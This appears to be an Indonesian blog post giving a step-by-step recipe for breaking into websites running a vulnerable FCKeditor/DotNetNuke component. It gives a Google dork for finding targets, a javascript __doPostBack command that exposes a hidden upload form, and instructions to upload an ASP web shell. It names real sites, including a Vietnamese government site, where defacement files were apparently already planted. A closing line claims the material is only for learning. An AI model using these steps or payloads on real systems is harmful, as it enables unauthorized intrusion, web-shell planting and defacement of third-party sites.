Banyak teknik utk meng-audit websites target...
Pertama : melakukan identifikasi websites target.
Kedua : mencari hole websites target.
Ketiga : mengakses / masuk ke websites target.
Keempat : upload Shell.
Kelima : Full Akses Websites target...
==========
inurl:"fcklinkgallery.aspx"
misalnya ketemu :
http://fril.co.il/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
==> Selanjutnya klik pilihan yg paling bawah : ( File ( A File On Your Site )
==> lalu di pada browser-nya paste aja magic command ini :
javascript:__doPostBack('ctlURL$cmdUpload','')
===> "SIM SALABIM" Selanjutnya akan muncul link UPLOAD.
setelah itu, lakukan upload file... bisa JPG maupun SHELL ASP.
Selanjutnya buka hasil upload nya di :
http://fril.co.il/portals/0/gerandongers.jpg
Sim Salabim,... PROK PROK jadi Gerandong...
http://fril.co.il/portals/0/gerandongers.jpg
~~~~~~~~~~~~~~~~~~~~~
http://www.vieclamvietnam.gov.vn/portals/0/gerandongers.jpg
Jadikan Semua Pembelajaran ini untuk pembelajaran bukan Untuk Disalahgunakan
Tidak ada komentar:
Posting Komentar